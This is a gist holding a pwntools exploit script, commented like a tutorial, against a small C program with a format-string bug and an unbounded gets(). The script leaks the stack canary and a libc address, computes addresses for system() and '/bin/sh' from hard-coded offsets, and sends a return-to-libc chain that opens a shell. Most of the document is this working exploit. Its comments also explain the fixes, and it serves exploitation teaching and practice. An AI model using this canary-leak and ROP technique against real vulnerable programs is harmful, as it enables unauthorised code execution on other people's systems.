@Sinkmanu
Created May 24, 2018 08:11
Easy exploit to bypass canary, ASLR and NX
from pwn import *
# Reference copy of the toy target this script drives. It is a plain string
# here, not executed: the C source shows the two weaknesses exercised below,
# a printf() whose format string is argv[1] and an unbounded gets() into
# a 64-byte stack buffer. Both disappear with `printf("%s", argv[1])` and a
# bounded read such as fgets(buff, sizeof buff, stdin); gcc's -Wformat-security
# warns about the first pattern at compile time.
'''
// File: leak.c
// gcc leak.c -o leak
#include <stdio.h>
int main(int argc, char *argv[]){
char buff[64];
printf(argv[1]);
printf("\n");
gets(buff);
return 0;
}
'''
# stack canary and __libc_start_main+240 leak - %17$p,%19$p
# Because the first printf has no fixed format, positional %N$p specifiers in
# argv[1] print stack slots; slots 17 and 19 are what this particular build
# exposed (the indices are build-specific, not general).
context(arch = 'amd64', os = 'linux')
p = process(["./leak", "%17$p,%19$p"])
#p = gdb.debug(["./leak", "%17\$p,%19\$p"], '''
#b *main
#r %17$p,%19$p
#''')
# Read the target's first output line (terminated by the second printf's "\n").
# NOTE(review): str/bytes are mixed freely throughout this script (str split,
# str + p64() output), which only works under Python 2 pwntools — TODO confirm.
canary_libc = p.recvuntil("\x0a")
# First leaked value: the stack canary, re-packed as 8 little-endian bytes so
# it can be written back unchanged (a correct canary value is what lets the
# overflow below pass the stack-protector check).
canary = p64(int(canary_libc.split(",")[0], 16))
__libc_start_main = p64(int(canary_libc.split(",")[1], 16)) # -240  (unused below; kept for reference)
# Second leaked value is a return address inside __libc_start_main; subtracting
# 240 (per the comment above) and the symbol's offset gives the libc load base.
# All four constants below are hard-coded for one specific libc build and are
# not valid anywhere else.
libc_addr = int(canary_libc.split(",")[1], 16)-240 - 0x20740
system_addr = libc_addr + 0x45390
pop_rdi = libc_addr + 0x21102
bin_sh = libc_addr + 0x18cd57
log.success("Canary: " + canary_libc.split(",")[0])
log.success("libc addr: " + hex(libc_addr))
log.success("system addr: " + hex(system_addr))
log.success("gadget \"pop rdi, ret\": " + hex(pop_rdi))
log.success("/bin/sh addr: " + hex(bin_sh))
# Payload delivered to gets(): 72 bytes of filler up to the canary slot
# (presumably the 64-byte buffer plus 8 bytes of alignment/locals — verify in a
# debugger), the leaked canary, 8 bytes presumably covering the saved frame
# pointer, then the three return-address slots. gets() stops at the newline
# sendline() appends.
p.sendline("A"*72+canary+"AAAAAAAA"+p64(pop_rdi)+p64(bin_sh)+p64(system_addr))
p.interactive()